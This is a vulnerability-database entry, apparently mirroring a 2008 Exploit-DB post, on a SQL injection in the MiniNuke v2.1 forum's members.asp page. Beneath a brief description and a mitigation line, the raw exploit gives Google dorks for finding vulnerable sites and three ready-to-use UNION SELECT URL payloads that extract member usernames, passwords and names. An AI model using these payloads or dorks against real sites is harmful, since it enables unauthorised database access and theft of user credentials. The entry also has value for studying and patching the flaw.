MiniNuke v2.1 forum SQL Injection

vendor:

MiniNuke v2.1 forum

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MiniNuke v2.1 forum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MiniNuke v2.1 forum SQL Injection

MiniNuke v2.1 forum is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted URL to the vulnerable application. The URL contains malicious SQL query which can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################
#
# MiniNuke v2.1 forum SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"members.asp?action"
#
# DORK 2 : allinurl: "members.asp"uid
#
################################################################
EXAMPLE=

members.asp?action=member_details&uid=SQL (exploit)

EXPLOIT 1 :

members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,sifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1,1,1,1,1%20from%20members

EXPLOIT 2 :

members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20from%20members

EXPLLOIT 3 :

members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20members


################################################################
# S@BUN               i AM NOT HACKER              S@BUN
################################################################

# milw0rm.com [2008-02-25]